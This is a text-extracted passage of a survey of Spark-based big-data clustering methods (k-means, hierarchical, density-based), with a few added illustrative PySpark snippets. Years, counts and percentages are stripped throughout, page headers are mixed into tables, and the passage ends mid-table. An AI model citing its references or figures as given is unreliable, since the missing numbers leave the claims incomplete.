spark graphx. graphx (xin et al., ) is a library for manipulating graphs (e.g., a social network's friend graph) and performing graph-parallel computations. like spark streaming and spark sql, graphx extends the spark rdd api, allowing us to create a directed graph with arbitrary properties attached to each vertex and edge. graphx also provides various operators for manipulating graphs (e.g., subgraph and mapvertices) and a library of common graph algorithms.
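to make the driver/executor model and the rdd and dataframe abstractions described above more concrete, the following is a minimal, hedged sketch, not drawn from any of the surveyed papers, showing lazy transformations followed by actions on an rdd, in-memory caching, and a simple spark sql query; the column names and values are hypothetical.

```python
from pyspark.sql import SparkSession

# the driver program creates a SparkSession, which coordinates work on the executors
spark = SparkSession.builder.appName("spark-basics-sketch").getOrCreate()
sc = spark.sparkContext

# rdd example: transformations (filter, map) are lazy; actions (sum, count) trigger execution
numbers = sc.parallelize(range(1, 1001))            # distribute a collection across executors
even_squares = numbers.filter(lambda x: x % 2 == 0).map(lambda x: x * x).cache()  # cache keeps it in memory
total = even_squares.sum()                          # first action: computes and caches the rdd
how_many = even_squares.count()                     # second action: reuses the cached partitions

# spark sql example: a dataframe carries schema information, enabling sql queries
df = spark.createDataFrame([(1, "a", 3.0), (2, "b", 5.5), (3, "a", 4.0)], ["id", "label", "value"])
df.createOrReplaceTempView("records")
spark.sql("SELECT label, AVG(value) AS avg_value FROM records GROUP BY label").show()

spark.stop()
```

the in-memory reuse shown by cache() is the property that makes spark particularly attractive for iterative clustering computations, as discussed in the following subsection.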
clustering big data
clustering is a popular unsupervised method and an essential tool for big data analysis. clustering can be used either as a pre-processing step to reduce data dimensionality before running the learning algorithm, or as a statistical tool to discover useful patterns within a dataset. clustering methods are based on iterative optimization (xu & tian, ). although these methods are effective in extracting useful patterns from datasets, they consume massive computing resources and come with high computational costs due to the high dimensionality associated with contemporary data applications (zerhari, lahcen & mouline, ).
challenges of clustering big data
the challenges of clustering big data are characterized by three main components:
1. volume: as the scale of the data generated by modern technologies rises exponentially, clustering methods become computationally expensive and do not scale up to very large datasets.
2. velocity: this refers to the speed at which data arrives at the system. dealing with high-velocity data requires the development of more dynamic clustering methods to derive useful information in real time.
3. variety: current data are heterogeneous and mostly unstructured, which makes managing, merging and governing the data extremely challenging.
conventional clustering algorithms cannot handle the complexity of big data due to the above reasons. for example, the k-means problem is np-hard, even when the number of clusters is small. consequently, scalability is a major challenge in big data. traditional clustering methods were developed to run on a single machine, and various techniques are used to improve their performance. for instance, sampling is used to perform clustering on samples of the data and then generalize the result to the whole dataset; this reduces the amount of memory needed to process the data but results in lower accuracy. another technique is feature reduction, where the dataset is projected into a lower-dimensional space to speed up the mining process (shirkhorshidi et al., ); both workarounds are illustrated in the short sketch at the end of this subsection. nevertheless, the constant growth in big data volume exceeds the capacity of a single machine, which underlines the need for clustering algorithms that can run in parallel across multiple machines. for this purpose, apache spark has been widely adopted to cope with big data clustering issues. spark provides in-memory, distributed and iterative computation, which is particularly useful for performing clustering computations. it also provides an advanced local data caching system, a fault-tolerance mechanism and a fast distributed file system.
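as a concrete illustration of the two single-machine workarounds just mentioned, the following hedged sketch, which is not taken from any of the surveyed papers, draws a random sample of a spark dataframe before clustering and projects the features into a lower-dimensional space with pca; the dataset, column names and parameter values are hypothetical.

```python
from pyspark.sql import SparkSession
from pyspark.ml.feature import VectorAssembler, PCA

spark = SparkSession.builder.appName("scalability-workarounds-sketch").getOrCreate()

# hypothetical numeric dataset with three feature columns
df = spark.createDataFrame(
    [(float(i), float(i % 7), float(i % 13)) for i in range(10_000)],
    ["f1", "f2", "f3"],
)

# workaround 1: sampling - work on a 10% random sample instead of the full dataset
sample_df = df.sample(withReplacement=False, fraction=0.1, seed=42)

# workaround 2: feature reduction - project the features into a 2-dimensional space
assembler = VectorAssembler(inputCols=["f1", "f2", "f3"], outputCol="features")
assembled = assembler.transform(sample_df)
pca_model = PCA(k=2, inputCol="features", outputCol="reduced").fit(assembled)
reduced = pca_model.transform(assembled)
reduced.select("reduced").show(5, truncate=False)

spark.stop()
```

both techniques trade accuracy for speed and memory, which is precisely the limitation that motivates the fully distributed spark-based clustering methods reviewed later in this survey.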
literature review
the topic of clustering big data using the spark platform has not been adequately investigated by academia. this motivates a comprehensive survey of research works in this regard. the literature in this area has already come up with some surveys and taxonomies, but most of them are related to the hadoop platform, while others are outdated or do not cover every aspect of clustering big data using spark. the work in rotsnarani & mrutyunjaya ( ) conducted a survey on the hadoop framework for big data processing; different features of hadoop map-reduce are discussed to deal with the problems of scalability and complexity in processing big data. rujal & dabhi ( ) conducted a survey on k-means using the map-reduce model. in this article, the technical details of parallelizing k-means using apache hadoop are discussed. according to this research, the k-means method is regarded as a viable approach for certain applications of big data clustering and has attracted more researchers than any other technique. on the other hand, sood & singh ( ) conducted a survey on the major challenges for big data processing using hadoop map-reduce. according to this survey, network latency is the main limitation of hadoop. the authors of manwal & gupta ( ) conducted a survey on big data and hadoop architecture. the paper classifies existing hadoop-based systems and discusses their advantages and disadvantages. the paper explains the different technologies (hbase, hive, pig, etc.) used with the hadoop distributed file system (hdfs). jiang et al. ( ) conducted a survey on large-scale data processing using hadoop over the cloud. the main components of the hadoop platform and their functionalities are discussed. the work in shanjiang et al. ( ) conducted a comprehensive survey on the spark ecosystem for processing large-scale data. in this article, the spark architecture and programming model are introduced. the authors discussed the pros and cons of the spark platform as well as the various optimization techniques used for improving spark performance when processing large-scale data. in maheshwar & haritha ( ), the authors discussed the advantages of spark over the hadoop map-reduce model. huang et al. ( ) conducted a survey on the parallelization of density-based clustering algorithms for spatial data mining based on spark. the authors of ketu & agarwal ( ) conducted a performance evaluation of k-means over spark and map-reduce. on the other hand, a performance evaluation of three versions of k-means clustering for biomedical data using spark was conducted in shobanadevi & maragatham ( ). a performance evaluation of parallel k-means with optimization algorithms for clustering big data using spark was conducted in santhi & jose ( ). however, all the above surveys either predate the period covered here or do not present a comprehensive discussion of all types of clustering methods. therefore, a comprehensive survey on clustering algorithms of big data using apache spark is required to assess the current state-of-the-art and outline the future directions of clustering big data.
survey methodology
the subject matter reviewed in this article is based on a literature review of clustering methods using apache spark. we searched for works regarding this topic and classified them into different clustering techniques. all these papers address optimizing clustering techniques to solve big data clustering problems with various goals, viz., improving clustering accuracy, minimizing execution time, and increasing throughput and scalability. particularly, we are addressing the following questions:
• what are the types of spark-based clustering methods?
• which methods were used in the literature to cluster big data?
• what are the gaps in this research area?
• what optimization techniques were used in clustering?
• what are the pros and cons of the different spark-based clustering methods?
search strategy
to narrow the scope of the search for relevant papers to be included in this study, we used the "and" and "or" boolean operators to combine the terms related to spark-based clustering of big data. the following terms were used to find the relevant papers.
• "clustering big data using spark",
• "apache spark for big data",
• "clustering big data",
• "clustering methods",
• "data partitioning",
• "big data partitioning",
• "data segmentation".
the papers relevant to spark-based clustering of big data were retrieved from the following online sources.
• ieee explorer
• springer
• elsevier
• sciencedirect
• google scholar
• researchgate
paper filtering
initially, papers (plus additional reference-book papers) were identified through our search using the previously explained search strategies. as shown in fig. , of these were eliminated via our exclusion criteria, and papers remained. by reading and analysing the full-text articles, of them were excluded. irrelevant papers were removed by applying the exclusion criteria (shown below).
in addition, duplicate papers retrieved from multiple sources were removed. finally, articles were included in this survey. the following inclusion/exclusion rules were applied to these papers.
• inclusion criteria:
– papers published within the period from january to april .
– papers in the area of spark-based big data clustering.
– papers written in the english language.
• exclusion criteria:
– papers on clustering but not on big data.
– papers that do not use a big data platform such as spark.
– papers with no clear publication information, such as publisher, year, etc.
figure: flowchart for paper exclusion (prisma-style diagram covering identification, screening, eligibility and inclusion: records identified through database searching and through other sources, records after duplicates were removed, records screened and excluded, full-text articles assessed for eligibility and excluded with reasons, and studies included in the qualitative and quantitative synthesis).
figure: taxonomy of spark-based clustering methods.
spark-based clustering algorithms
in this work, the taxonomy of spark-based big data clustering is developed to cover all the existing methods. figure shows the developed taxonomy.
survey findings: the research questions (see 'survey methodology') that we investigated in this survey are addressed as shown below:
• answer to q : the spark-based clustering algorithms were divided into three main categories: k-means based methods, hierarchical-based methods and density-based methods. each of these main categories was divided further into subcategories as depicted in fig. . a detailed discussion of the spark-based clustering methods in these subcategories is presented in the subsections 'k-means based clustering', 'hierarchical clustering' and 'density-based clustering' (fig. and table ).
• answer to q : we discuss the different methods that have been proposed in the literature under each of the three main spark-based clustering categories in 'k-means based clustering', 'hierarchical clustering' and 'density-based clustering'. the methods in these subsections are grouped based on their similarities in approach. this grouping of the discussed methods is shown in table .
• answer to q : the gaps in the spark-based clustering field are identified as two main points. the first is the lack of utilization of ai tools in clustering data and the lack of use of big data platforms. the second is that most current clustering methods do not support the variety and velocity characteristics of big data. more discussion on this issue is in 'discussion and future direction'.
table comparison of spark-based clustering methods in terms of the supported big data characteristics (volume, variety and velocity) and the type of data (real or synthetic) on which the proposed method was validated. category sub-category paper supported big data characteristic validated on volume variety velocity real synthetic kusuma et al.
( ) √ √ √ sarazin, lebbah & azzag ( ) √ √ gao & zhang ( ) √ √ thakur & dharavath ( ) √ √ lighari & hussain ( ) √ √ machine learning kamaruddin, ravi & mayank ( ) √ √ √ √ wu et al. ( ) √ √ win et al. ( a) √ √ win et al. ( b) √ √ liu et al. ( ) √ √ fuzzy bharill, tiwari & malviya ( ) √ √ shah ( ) √ √ lavanya, sairabanu & jain ( ) √ √ pang et al. ( ) √ √statistics chakravorty et al. ( ) √ √ √ √ wang et al. ( ) √ √ √ sinha & jana ( ) √ √ backhoff & ntoutsi ( ) √ √ √ ding et al. ( ) √ √ sharma, shokeen & mathur ( ) √ √ ben hajkacem, ben n’cir & essoussi ( ) √ √ √ √ ben hajkacem, ben n’cir & essoussi ( ) √ √ √ √ zayani, ben n’cir & essoussi ( ) √ √ √ chitrakar & petrovic ( ) √ √ fatta & al ghamdi ( ) √ √ zhang et al. ( ) √ √ solaimani et al. ( ) √ √ √ √ k-means scalable mallios et al. ( ) √ √ guo, zhang & zhang ( ) √ √ ianni et al. ( ) √ √data mining lee & kim ( ) √ √ sarazin, azzag & lebbah ( ) √ √ √ machine learning malondkar et al. ( ) √ √ √ √ jin et al. ( ) √ √ solaimani et al. ( ) √ √ √ √ hierarchical scalable hassani et al. ( ) √ (continued on next page) saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) category sub-category paper supported big data characteristic validated on volume variety velocity real synthetic rui et al. ( ) √ √ zhou & wang ( ) √ √ √ kim et al. ( ) √ √graph lulli, dell’amico & ricci ( ) √ √ √ han et al. ( a) √ √ hosseini & kourosh ( ) √ √ √data mining aryal & wang ( ) √ √ hosseini & kiani ( ) √ √ √ corizzo et al. ( ) √ √ √ √machine learning liang et al. ( ) √ √ √ luo et al. ( ) √ √ han et al. ( b) √ √ √ baralis, garza & pastor ( ) √ √ density scalable gong, sinnott & rimba ( ) √ √ • answer to q : some existing works employed optimization techniques to improve clustering results. these optimization techniques were mainly used with k-means methods as discussed in ‘fuzzy based methods’ and ‘clustering optimization’. • answer to q : the pros and cons of the different methods are discussed in the ‘k-means based clustering’, ‘hierarchical clustering’ and ‘density based-clustering’, that discuss the different types of spark-based clustering methods. we also discuss our findings related to the spark-based clustering methods in ‘discussion and future direction’. k-means based clustering this method divides the data into disjoint clusters of similar points. in each cluster, a central point is obtained via a distance function and is considered as the centroid of all other points within the cluster. the clusters are iteratively optimized until an optimal solution is reached. k-mean is a framework of clustering or a family of distance functions, which provides the basis for different variants of k-mean algorithms. k means is extensively used in clustering big data due to its simplicity and fast convergence. one major backward of k-means is the priori setting of the number of clusters, which have significant effect on the accuracy of final classification (hartigan, wong & algorithm, ). in addition, k-means is not suited in situations where the clusters do not show convex distributed or vary in sizes (jain, ). due to these limitations, several modifications of k -means have been proposed such as fuzzy k-means and k-means++ (huang, ). several works have been conducted to execute k-means effectively under the spark framework to improve its performance and scalability. 
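as a concrete reference point for the k-means family reviewed below, the following is a minimal, illustrative sketch, not reproducing any specific surveyed method, of spark mllib's built-in k-means together with a silhouette score, which is one simple way of probing the a-priori choice of the number of clusters noted above; the data and parameter values are hypothetical.

```python
from pyspark.sql import SparkSession
from pyspark.ml.feature import VectorAssembler
from pyspark.ml.clustering import KMeans
from pyspark.ml.evaluation import ClusteringEvaluator

spark = SparkSession.builder.appName("kmeans-sketch").getOrCreate()

# hypothetical two-dimensional points forming two loose groups
rows = [(0.1, 0.2), (0.3, 0.1), (0.2, 0.4), (9.0, 9.1), (9.3, 8.8), (8.9, 9.4)]
df = VectorAssembler(inputCols=["x", "y"], outputCol="features") \
    .transform(spark.createDataFrame(rows, ["x", "y"]))

evaluator = ClusteringEvaluator(featuresCol="features")  # silhouette score by default
for k in (2, 3):  # the number of clusters must be supplied up front, as noted above
    model = KMeans(k=k, seed=1, featuresCol="features").fit(df)
    assigned = model.transform(df)                       # adds a "prediction" column
    print(k, model.clusterCenters(), evaluator.evaluate(assigned))

spark.stop()
```

the surveyed works below extend or replace pieces of this basic pipeline, for example by changing the seeding strategy, the distance computation or the partitioning of the data across executors.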
therefore, the spark-based k-means methods can be divided into four subcategories: machine learning based methods, fuzzy based methods, statistics based methods and scalable methods. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. machine learning based methods the authors of kusuma et al. ( ) designed intelligent k-means based on spark. intelligent k-means is a fully unsupervised learning that cluster data without any information regarding the number of clusters. a parallel implementation of biclustering using map-reduce over spark platform was proposed by sarazin, lebbah & azzag ( ). for improving the selection process of k-means, (gao & zhang, ) combines particle swarm optimization and cuckoo-search to initiate better cluster centroid selections using spark framework. the work in thakur & dharavath ( ) proposes a hybrid approach that integrate k-means and decision tree to cluster and detect anomaly in big data. at first, k-means is applied on the data to produce the clusters and then decision tree algorithm is applied on each cluster to classify normal and anomaly instances. in lighari & hussain ( ) the author combines rule based and k-means algorithm for the detection of network anomalies using apache spark. rule based is used for the detection of known attacked, while k-means is used as unsupervised learning for the detection of new unknown attacks. kdd cup dataset was used to evaluate the algorithm and % accuracy was achieved. a paralleled algorithm for the evolving clustering method was proposed by kamaruddin, ravi & mayank ( ). emc is an online method which process one data sample on a single pass and there is no iteration required to process the same data again. these features make the algorithm highly efficient for processing contemporary real time applications where data arrive in a stream with high dimensionality. the authors evaluated the proposed algorithm using massive credit card fraud dataset and the results show its superiority over the traditional single emc method. fuzzy based methods the authors of wu et al. ( ) proposed a parallel implementation of fuzzy consensus clustering for on the spark platform for processing large scale heterogenous data. the authors of win et al. ( a) developed a crime pattern-discovery system based on fuzzy clustering under spark. the method uses l norm rather than euclidian distance to optimize the distance computations. in another paper, the fuzzy clustering method is used under spark to detect potential criminal patterns in large-scale spatiotemporal datasets (win et al., b). in liu et al. ( ) the authors developed a parallel fuzzy based image segmentation algorithm for handling big data in the agriculture field. at first, the images were converted to rgb and distributed to the available nodes in cloud. then, the membership of pixel points to different cluster centroids were calculated. finally, the centroids of the clusters are updated iteratively until an optimal solution is obtained. the performance of the algorithm was evaluated using the spark platform and a significant reduction in execution time compared to hadoop-based approach. the authors of bharill, tiwari & malviya ( ) proposed an algorithm of fuzzy c-means. the proposed algorithm is a modification of the scalable random sampling with iterative optimization (srsio-fcm). 
the highlighted characteristics of this research were the elimination of the need for maintaining the membership matrix, which proved pivotal in reducing execution time. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. statistics based methods the authors of shah ( ) used apache spark to perform text clustering. two algorithms were used: k-means and lda. lda is widely used technique for clustering high dimensional text data and it produces considerably higher clustering accuracy than conventional k- means. in lavanya, sairabanu & jain ( ) the authors used gaussian mixture model on spark mllib to cluster the zika virus epidemic. the produced clusters were useful to visualize the spread of the virus during the epidemic. the authors of pang et al. ( ) implemented gmm clustering method under the framework of spark. gibbs sampling method is used instead of expectation maximization algorithm to estimate the parameters of the model. the efficiency of the algorithms was verified via multi-method comparison. the authors in chakravorty et al. ( ) presented a novel distributed gaussian based clustering algorithm for analysing the behaviour of households in terms of energy consumption. various factors such as weather conditions, type of day and time of the day were considered. the proposed algorithm under spark shows a higher accuracy than other standard regression methods for energy consumption forecasting. scalable methods a parallel implementation of k means algorithm over spark is proposed in wang et al. ( ). the proposed algorithm involves three strategies for seeding: ( ) a subset of data is selected randomly for partitioning. ( ) sequentially selecting k instance based on probability. ( ) stochastically selecting seeds in parallel. the efficiency of the proposed algorithm was demonstrated via experiments on large scale text and uci datasets. in another paper, the authors addressed the issue of pre-determining the number of input clusters which is a present problem in most k-means methods by automating the number of input clusters which resulted in better clustering quality when processing large scale data (sinha & jana, ). in backhoff & ntoutsi ( ), the authors presented a scalable k-means algorithm based on spark streaming for processing real time- data. the algorithm consists of two parts. one part runs an online algorithm over the stream data and obtains only statistically relevant information and another part that uses an offline algorithm on the results of the former to produce the actual clusters. since the algorithm only retains statistically relevant information, it’s possible to save more physical spaces. in addition, the proposed algorithm can explain the evolution of the data as all the needed information is retrievable from the stored statistical information. the authors of ding et al. ( ) used k-means under spark to cluster students’ behaviors into different categories using information gathered from universities’ information system management. it is a powerful technique for performing simultaneous clustering of rows and columns in a matrix data format. this method is used extensively for the study of genes expression. the authors of sharma, shokeen & mathur ( ) clustered satellite images in an astronomy study using in k-means++ under the spark framework. in this paper, the authors simultaneously apply k-means multiple times with different initial centroids and value of k under each iteration. 
the optimal value of k is determined by clusters validity index for all the executions. the work in ben hajkacem, ben n’cir & saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. essoussi ( ) presented a spark-based k-prototypes (skp) clustering method for mixed large-scale data analysis. the authors exploit the in-memory operations of spark to reduce the consumption time of mrkp method. the method was evaluated using simulated and real datasets under spark and hadoop platform and the results show that higher efficiency and scalability is achieved under spark. the authors of ben hajkacem, ben n’cir & essoussi ( ) implemented a scalable random sampling for k-prototypes using spark. the algorithm randomly selects a small group of data points and approximate the cluster centers from these data. as a result, the method perform computation for only small portion of the whole data set, which result in a significant speedup of existing k-prototypes methods. a parallel overlapping k-means algorithm (pokm) is proposed in zayani, ben n’cir & essoussi ( ). this algorithm can perform parallel clustering processes leading to non-disjoint partitioning of data. an implementation of parallel k-means with triangle inequality based on spark is proposed in chitrakar & petrovic ( ). the method is an improved version of k-means, which is supposed to speed up the process of analysis by skipping many point-centre distance computations, which can be beneficial when clustering high dimensional data. the authors of fatta & al ghamdi ( ) implemented k-means with triangle inequality to reduce search time and avoid redundant computation. the authors point out that the efficiency of k-means can be improved significantly using triangle inequality optimisations. a distributed possibilistic c-means algorithm is proposed in zhang et al. ( ). possibilistic c means differ from other k-means techniques by assigning probabilistic membership values in each cluster for every input point rather than assigning a point to a single cluster. the authors of solaimani et al. ( ) implemented an adaptive k-mean using spark stream framework for real time-anomaly detection in clouds virtual machines. the authors evaluated the method under spark and storm in terms of the average delays of tuples during clustering and prediction and the results indicate that spark is significantly faster than storm. mallios et al. ( ) designed a framework for clustering and classification of big data. the framework integrates k-means and decision tree learning (id ) algorithms. the authors evaluated the framework under spark in cluster of nodes. the results show that the proposed algorithms outperform spark machine learning library but is slightly slower than the approximate k-means. hierarchical clustering this clustering technique is composed of two approaches: agglomerative and divisive. the first approach considers every data point as a starter in its singleton cluster and the two nearest clusters are combined in each iteration until the two different points belong to a similar cluster. however, the second approach performs recursive top-down splitting. the existing hierarchical clustering methods can be divided into three subcategories: data mining based methods, machine learning based methods and scalable methods. data mining based methods a weighted agglomerative hierarchical clustering algorithm is introduced in guo, zhang & zhang ( ). 
the algorithm was developed to analyse residents’ activities in china. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the data was based on the mobile phone’s connection with the nearest stations, and within a week that data was collected and stored in spark for analysing. at first, hot areas where there are large population were identified, followed by an analysis of pedestrian’s flow for each hot area. meaningful information was obtained at less cost and higher accuracy than the traditional method of investigation. the work in ianni et al. ( ) proposed a distributed-hierarchical based clustering algorithm that combines the features of the divisive and agglomerative methods. the method consists of two operations. the first operation performs a division on the domain of the dataset using the definition of binary space partition, which yields a set of coarse clusters that are then refined by identifying outliers and assigning remaining points to nearest cluster. the second operation involves an agglomerative procedure over the previously refined clusters. in lee & kim ( ), they proposed a distributed-based hierarchical clustering system for large-scale semiconductor wafers (dhcssw) by applying the big data spark framework to existing hierarchical clustering algorithm. machine learning based methods in sarazin, azzag & lebbah ( ), the authors designed clustering algorithms that can be used in mapreduce using spark platform. particularly, they focus on the practical and popular serial self-organizing map clustering algorithm (som). malondkar et al. ( ) proposed an algorithm called spark-ghsom, which scales to large real-world datasets on a distributed cluster. moreover, it also proposed a new distance hierarchy approach for mixed attribute datasets and generated a multi-level hierarchy of som layers. scalable methods in jin et al. ( ), a parallel algorithm of single-linkage hierarchical clustering was proposed by formulating the problem as a minimum spanning tree problem. the algorithm was evaluated using two large datasets with different distributions. the authors observed that spark is totally successful for the parallelization of linkage hierarchical clustering with acceptable scalability and high performance. the work in solaimani et al. ( ) proposed a system to detect anomaly for multi-source vmware-based cloud data center. the framework monitors vmware performance stream data (e.g., cpu load, memory usage, etc.) continuously. the authors of hassani et al. ( ) presented an incremental hierarchical density-based stream clustering algorithm based on cluster stability. density-based clustering density-based clustering approaches in comparison with other types of clustering algorithms have some superiorities, such as clustering arbitrary shape groups of data regardless of the geometry and distribution of data, robustness to outliers, independence from the initial start point of the algorithm, and its deterministic and consistent results in the repeat of the similar algorithm. motivated by these features, several studies have been conducted on the parallelization of density clustering method over spark. density-based clustering methods can be divided into four subcategories: graph based methods, data mining based methods, machine learning based methods and scalable methods. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. graph based methods in rui et al. 
( ), the authors proposed a parallel implementation of density peaks clustering algorithm based on spark’s graphx. the method was evaluated using spark and the results indicate that spark can perform up to x time faster compared to hadoop map- reduce implementation. zhou & wang ( ) proposed a distributed parallel algorithm of structure similarity clustering based on spark (sparkscan) to cluster directed graph. similarly, the authors of kim et al. ( ) exploited the advantage of the in-memory computation feature of spark to design a distributed network algorithm called cass for clustering large-scale network based on structure similarity. optimization approaches such as bloom filter and shuffle selection are used to reduce memory usage and execution time. lulli, dell’amico & ricci ( ) designed a distributed algorithm that produces an approximate solution to the exact dbscan clustering. the method uses vertex-centric instead of euclidean distance whereby a neighbourhood graph is computed. data mining based methods in another paper han et al. ( a), the authors presented a fast parallel dbscan algorithm using spark to get around the shuffle operation. each executor computes the partial clusters locally. the merging process is deferred until all the partial clusters have been sent back to the driver. in hosseini & kourosh ( ) the authors propose a scalable distributed density based hesitant fuzzy clustering for finding similar expression between distinct genes. the proposed method benefits from the robustness of density-based clustering against outliers and from the weighted correlation operators of hesitant fuzzy clustering to measure similarity. the output clusters are based on the content of the neighbour graph. aryal & wang ( ) designed and implemented a scalable shared nearest neighbours clustering called sparksnn over spark framework. shared nearest neighbours is proven efficient for handling high-dimensional spatiotemporal data. the algorithm was evaluated in terms of scalability and speed-up using marylanf crime data, the results demonstrated the effectiveness of the proposed algorithm. machine learning based methods an algorithm based on adaptive density estimation is proposed for distributed big data approach and tested on some prevalent datasets. this algorithm has no dependency, and every step of the algorithm executes independently. bayesian locality sensitive hashing (lsh) is used to divide the input data into partitions. the outliers are filtered out by locality preservation, which makes this approach robust. the clusters are made very much homogenous via density definition on ordered weighted averaging distance hosseini & kiani ( ). a scalable distributed density-based clustering for performing multi- regression tasks is proposed in corizzo et al. ( ). in this work, locality sensitive hashing is used to enable the algorithm to handle high dimensional data. a distributed clustering algorithm named remold is introduced in liang et al. ( ). a two-step strategy has been applied in the remold algorithm. in the first step, it uses the lsh partitioning method for balancing the effect of runtime and local clustering while in the second step the partitions are clustered locally and independently using kernel-density and higher-density saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. nearest neighbour. gaussian distribution is used to model the local clusters. 
these models are eventually assembled at a central server to form the global clusters. scalable methods in luo et al. ( ), a parallel implementation of dbscan algorithm (s_ dbscan) based on spark is proposed. the algorithm is divided into three stages; partitioning the input data based on random sampling; perform local dbscan in parallel to generate partial clusters; merge the partial clusters based on the centroid. the algorithm can quickly realize the mergers and divisions of clustering results from the original data. the authors compared the performance of their parallel algorithm with a serial version on the spark platform for massive data processing and an improvement in performance was demonstrated. han et al. ( b) proposed a scalable parallel implementation of dbscan algorithm in apache spark by applying a partitioning strategy. the algorithm uses a kd-tree in order to reduce the search time. to achieve better performance and scalability, a partitioning technique is applied to produce balanced sub-domains, which can be computed within spark executors. an implementation of dbscan algorithm using spark is proposed in baralis, garza & pastor ( ). initially, a pre-processing step is applied on the dataset to produce a set of representative points while retaining the original data distribution and density information. this enables the algorithm to scale up to large scale data. the new set is then used as an input to the algorithm for clustering. a real-time density-based clustering algorithm (rt-dbscan) is proposed in gong, sinnott & rimba ( ). rt-dbscan is an extension of dbscan for supporting streamed data analysis. the algorithm employs the concept of spatiotemporal distance for clustering spatio-temporal data. the algorithm was implemented over spark stream and evaluated using social media content. clustering optimization some spark-based clustering techniques, especially the k-means based methods, were supported by optimization techniques to improve their clustering results. due to the rise of ai based computing in recent years, some research works have utilized ai tool in enhancing the clustering methods while leveraging the benefits of big data platforms such as spark. other studies adapt optimization techniques to improve the performance of clustering methods. sherar & zulkernine ( ) proposed a hybrid method composed of pso and k-means using apache spark. the diversity of the swarm ensures that a global search is conducted, hence, the resulting cluster centroids are not dependent on the initial choice. the approach was compared with stand-alone k-means and it showed better performance in terms of convergence. hasan et al. ( ) proposed an adaptive swarm-based clustering for stream processing of twitter data. initially, fuzzy c-means is applied as pre-processing step to produce the initial cluster centres, then the clusters are further optimized using adaptive particle swarm optimization. the authors of wang & qian ( ) and (bonab et al., ) combined the robust artificial bee colony algorithm with the powerful spark framework for large scale data analysis. the characteristics of abc makes the algorithms avoid local minimum while spark in memory computation accelerates the speed of computation and convergence saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. time. the kdd cup data was utilized to verify the effectiveness of the method. 
the experimental results show that the algorithm produce high clustering quality and nearly as fast as the serial algorithms. other unsupervised learning such as self-organised map has also been proposed (sarazin, azzag & lebbah, ). to tackle high dimensional data, subspace clustering was proposed by sembiring, jasni & embong ( ). discussion and future direction from the discussion of the previous section, we note that most existing methods (see table ) have addressed the volume characteristic of the big data used in their experiments. however, few existing methods have shown that their methods support the variety and velocity characteristics of the used big data. additionally, most methods used real big data validate their proposed methods as seen in table . from table , we conclude that there is a lot of room for research in clustering methods to support the characteristics of variety and velocity of big data since only few works have addressed these issues. a fundamental assumption of most clustering algorithms is that all data features are considered equally important. however, such approach often fails in high dimensional space. a subspace clustering overcome the issue of high dimensional data by establishing a set of features that it supposes to be most significant for each cluster. since the big data platforms were only developed in the last few years, the existing clustering problems adapted to such platforms were extensions of the traditional clustering techniques. researchers are yet to develop clustering techniques that are native to the big data platforms such as spark. the research direction of adapting the optimization techniques such as psa, bee colony and abc to smoothly work with spark is yet to be investigated by researchers who are interested in clustering big data. another area of research that is has not been fully investigated is adopting fuzzy-based clustering algorithms on spark. in general, due to the infancy of spark-based clustering algorithms, only few researchers attempted designing techniques that leverage the potential of parallelism of spark in cluster big data. in the coming years, we foresee a large influx of research works in this important area of spark-based clustering of big data. particularly, there are ample opportunities in future research to utilize ai tools in clustering data while leveraging the benefits of big data platforms such as spark. in table , we note that most of the papers used in this survey were extracted from the ieee explorer. however, the other data sources shown in table were of great benefit to this survey. an interesting finding was shown in table , where most the existing spark-based clustering were published in the years – . this indicates that clustering methods that leverage big data platforms is still in its early days and there is a lot of potential of research in this area. in summary, we highlight three new research directions: • utilizing ai tools in clustering data while leveraging the benefits of big data platforms such as spark. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table shows the data sources of the spark-based clustering papers. data source paper ieee explorer dave & gianey ( ), hu et al. ( ), fasheng & xiong ( ), ajin & kumar ( ), verma, mansuri & jain ( ), xin et al. ( ), xu & tian ( ), manwal & gupta ( ), shanjiang et al. ( ), wang et al. ( ), sinha & jana ( ), kusuma et al. ( ), backhoff & ntoutsi ( ), ding et al. 
( ), sarazin, lebbah & azzag ( ), ben hajkacem, ben n’cir & essoussi ( ), wu et al. ( ), zayani, ben n’cir & essoussi ( ), chitrakar & petrovic ( ), win et al. ( b), liu et al. ( ), solaimani et al. ( ), chakravorty et al. ( ), lighari & hussain ( ), jin et al. ( ), guo, zhang & zhang ( ), solaimani et al. ( ), lee & kim ( ), hassani et al. ( ), sarazin, azzag & lebbah ( ), luo et al. ( ), han et al. ( b), aryal & wang ( ), liang et al. ( ), sherar & zulkernine ( ), wang & qian ( ), sarazin, azzag & lebbah ( b) elsevier bhadani & jothimani ( ), ben hajkacem, ben n’cir & essoussi ( ), rui et al. ( ) springer othman et al. ( ), baltas, kanavos & tsakalidis ( ), zerhari, lahcen & mouline ( ), rujal & dabhi ( ), sood, akshay & singh ( ), ketu & agarwal ( ), santhi & jose ( ), jain ( ), huang ( ), ben hajkacem, ben n’cir & essoussi ( ), win et al. ( a), gao & zhang ( ), pang et al. ( ), mallios et al. ( ), thakur & dharavath ( ), kamaruddin, ravi & mayank ( ), han et al. ( a), corizzo et al. ( ), zhou & wang ( ), gong, sinnott & rimba ( ), bonab et al. ( ) google scholar kim ( ), sharma, shokeen & mathur ( ), gousios ( ), aziz, zaidouni & bellafkih ( ), mishra, pathan & murthy ( ), jiang et al. ( ), shobanadevi & maragatham ( ), lavanya, sairabanu & jain ( ), kim et al. ( ), lulli, dell’amico & ricci ( ), hasan et al. ( ) researchgate shoro & soomro ( ), salloum et al. ( ), assefi et al. ( ), armbrust et al. ( ), hosseini & kiani ( ), hartigan, wong & algorithm ( ), shah ( ), 